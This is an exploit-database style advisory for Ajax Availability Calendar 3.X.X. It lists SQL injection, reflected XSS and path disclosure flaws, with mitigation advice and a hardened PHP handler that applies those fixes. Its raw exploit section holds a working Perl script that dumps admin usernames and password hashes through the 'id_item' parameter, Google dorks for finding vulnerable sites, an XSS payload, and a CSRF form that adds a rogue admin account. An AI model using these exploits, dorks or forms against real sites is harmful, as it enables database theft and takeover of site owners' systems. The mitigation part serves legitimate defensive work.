Vendor: Ajax Availability Calendar
By: AtT4CKxT3rR0r1ST
CVSS: 7.5 (HIGH)
Vulnerability types: Sql Injection, Reflected XSS, Full Path Disclosure
CWE: 89, 79, 200
Product Name: Ajax Availability Calendar
Affected Version From: 3.X.X
Affected Version To: 3.X.X
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Ajax Availability Calendar 3.X.X Multiple Vulnerabilities

The Ajax Availability Calendar 3.X.X script is vulnerable to SQL Injection, Reflected XSS, and Full Path Disclosure. The SQL Injection flaw lets an attacker execute arbitrary SQL commands through the 'id_item' parameter and read data from the database without authorization. The Reflected XSS flaw lets an attacker inject script through the same 'id_item' parameter, which may lead to arbitrary script execution in the victim's browser. The Full Path Disclosure flaw reveals the absolute filesystem path of the script, which may aid further attacks.

Mitigation:

To mitigate the SQL Injection, validate the 'id_item' value and use parameterized queries instead of concatenating user input into SQL. To mitigate the Reflected XSS, HTML-encode user input before placing it in an HTML context. To mitigate the Full Path Disclosure, disable the display of error messages to visitors or handle errors securely so that no path information is returned.
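As an added example (not code from Ajax Availability Calendar or from the advisory), the PHP handler below applies all three mitigations to the 'id_item' parameter. It assumes a constructed `items` table with `id_item` and `title` columns, uses an in-memory SQLite database so it runs offline, and feeds itself the advisory's own SQLi and XSS payloads to show that they are rejected or encoded.

```php
<?php
// Added example, not code from Ajax Availability Calendar: a hardened handler
// for the id_item parameter that the advisory shows being injected and
// reflected. Assumed: an `items` table with id_item and title columns
// (constructed here in SQLite so the script runs offline; the real
// application uses MySQL) and that id_item is always an integer.
declare(strict_types=1);
// Full Path Disclosure: never show errors (which include file paths)
// to visitors; log them server-side instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE items (id_item INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO items VALUES (1, 'Seaside Cottage')");

// Look up an item by the untrusted id_item value. Returns the row or null
// and never concatenates the value into SQL.
function findItem(PDO $db, string $rawId): ?array
{
    // SQL Injection: enforce the expected type first. Anything that is not a
    // plain integer (e.g. "null and 1=2 union select ...") is rejected here.
    $id = filter_var($rawId, FILTER_VALIDATE_INT);
    if ($id === false) {
        return null;
    }
    // Bind as a parameter, so the driver never interprets user text as SQL.
    $stmt = $db->prepare('SELECT id_item, title FROM items WHERE id_item = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Render the response; every value is HTML-encoded before it reaches the page.
function renderItem(?array $row, string $rawId): string
{
    // Reflected XSS: encode quotes, angle brackets and ampersands.
    $safeId = htmlspecialchars($rawId, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    if ($row === null) {
        return "<p>No item matches id_item=\"{$safeId}\".</p>";
    }
    $title = htmlspecialchars($row['title'], ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<h1>{$title}</h1>";
}

// Constructed inputs: a legitimate id, then the advisory's SQLi and XSS payloads.
$inputs = ['1',
    'null and 1=2 union select group_concat(username,0x3a,password) from bookings_admin_users --',
    '\'"--></style></script><script>alert(0x000581)</script>'];
foreach ($inputs as $input) {
    echo renderItem(findItem($db, $input), $input), "\n";
}
```

In the real application the value would come from `$_GET['id_item'] ?? ''` rather than the constructed list; the first input renders the item, the other two produce an encoded "no item" message and never reach the database as SQL.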

Exploit-DB raw data:

Ajax Availability Calendar 3.X.X Multiple Vulnerabilities
==============================================================
 
####################################################################
.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
.:. Script         : http://www.ajaxavailabilitycalendar.com/
.:. Dork           : intitle:"Ajax Availability Calendar"   ,   inurl:"/ac-admin/index.php"
####################################################################
===[ Exploit ]===

Sql Injection:
==============
#!/usr/bin/perl -w

# Ajax Availability Calendar 3.X.X Remote SQL Injection Vulnerability
# Author      : AtT4CKxT3rR0r1ST  
# Contact     : F.Hack@w.cn
# Script      : http://www.ajaxavailabilitycalendar.com/
# Admin Panel : www.site.com/ac-admin/ 
sub clear{
system(($^O eq 'MSWin32') ? 'cls' : 'clear'); }
clear();
print "|----------------------------------------------------|\n";
print "|          'Ajax Availability Calendar 3.X.X'        |\n";
print "| Coded by   : AtT4CKxT3rR0r1ST                      |\n";
print "|----------------------------------------------------|\n";
use LWP::UserAgent;
print "\nInsert Target:";
chomp(my $target=<STDIN>);
print "\n[!] Exploiting Progress...\n";
print "\n";
# Column name
$Column="group_concat(username,0x3a,password)";
# Table name
$table="bookings_admin_users";
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $target . "?id_item=null and 1=2 union select ".$Column."+from/**/".$table."+--+";
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
if ($answer =~ /:(.*):([0-9a-fA-F]{32})/) {
    print "\n[+] Admin User : $1\n";
}
if ($answer =~ /([0-9a-fA-F]{32})/) {
    print "\n[+] Admin Hash : $1\n";
    print "[+] Success !!\n";
} else {
    print "[-] Unable To Get The Information...\n";
}


Reflected XSS:
==============

www.site.com/?id_item='"--></style></script><script>alert(0x000581)</script>


Full Path Disclosure:
====================

www.site.com/ac-includes/common.inc.php


CSRF:
=====
[Add Admin]
-------------

<html>
<body>
<form method="POST" name="form0" action="http://www.site.com/ac-admin/index.php?page=admin_users&action=new">
<input type="hidden" name="add[username]" value="admin"/>
<input type="hidden" name="password" value="Palestine"/>
<input type="hidden" name="password2" value="Palestine"/>
</form>
</body>
</html>
####################################################################